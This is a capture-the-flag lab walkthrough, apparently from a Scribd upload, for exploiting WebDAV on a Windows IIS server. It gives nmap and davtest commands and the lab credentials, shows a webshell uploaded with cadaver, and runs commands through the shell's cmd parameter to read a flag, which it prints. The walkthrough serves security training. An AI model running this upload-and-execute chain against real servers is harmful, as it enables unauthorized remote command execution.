Windows IIS Server DAVTest

This document outlines the steps to exploit an IIS server using WebDAV by checking the target IP, running Nmap scans, and utilizing the davtest and cadaver tools to upload a backdoor. After successfully uploading the backdoor, it demonstrates how to access it and read a flag from the C: drive. The document serves as a reference for commands and procedures rather than a comprehensive guide.

Uploaded by

Harlian

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

63 views10 pages

Windows IIS Server DAVTest

Uploaded by

Harlian

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 10

Name Windows: IIS Server DAVTest

URL https://attackdefense.com/challengedetails?cid=2317

Type Windows Service Exploitation: IIS

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Checking the target IP address.

Note: The target IP address is stored in the “target” file.

Command: cat /root/Desktop/target

Step 2: Run a Nmap scan against the target IP.

Command: nmap 10.0.16.177

Step 3: We have discovered that multiple ports are open. We will be focusing on port 80 where
the IIS server is running.

Running http-enum nmap script to discover interesting directories.

Command: nmap --script http-enum -sV -p 80 10.0.16.177

We have found the webdav directory also received 401 error i.e Unauthorized.
Step 4: Running davtest tool.

Command: davtest -url http://10.0.16.177/webdav

We can notice, /webdav path is secured with basic authentication. We have the credentials
access the /webdav path using the provided credentials i.e bob:password_123321

Command: davtest -auth bob:password_123321 -url http://10.0.16.177/webdav

We can notice, we have uploaded almost all the important file types to the /webdav directory.
Also, we can execute three types of files. i.e asp, text, and html.

Step 5: Upload a .asp backdoor on the target machine to /webdav directory using cadaver
utility.

The .asp backdoor present in “/usr/share/webshells/asp/” directory. i.e

/usr/share/webshells/asp/webshell.asp

Command: cadaver http://10.0.16.177/webdav

Enter credentials: bob:password_123321

We can interact with the webdav directory using the cadaver tool.

Step 6: Uploading asp backdoor to the IIS web server in webdav directory.

Command: put /usr/share/webshells/asp/webshell.asp

We have successfully uploaded the backdoor.

Step 7: Access the backdoor using the firefox browser.

URL: http://10.0.16.177/webdav/webshell.asp

Enter credentials: bob:password_123321

We can enter windows commands in the yellow highlighted field.

Check the current running user.

URL: http://10.0.16.177/webdav/webshell.asp?cmd=whoami
We are running as an IIS apppool.

Step 8: Read the flag.

Check the content of the C:\ drive.

URL: http://10.0.16.177/webdav/webshell.asp?cmd=dir+C%3A%5C
We can notice, there is a flag.txt file present in the C:\ drive. Reading it.

URL: http://10.0.16.177/webdav/webshell.asp?cmd=type+C%3A%5Cflag.txt
This reveals the flag to us.

Flag: 0cc175b9c0f1b6a831c399e269772661

References:

1. DAVTest (https://github.com/cldrn/davtest)
2. Cadaver (https://github.com/grimneko/cadaver)
3. ASP Webshell
(https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asp)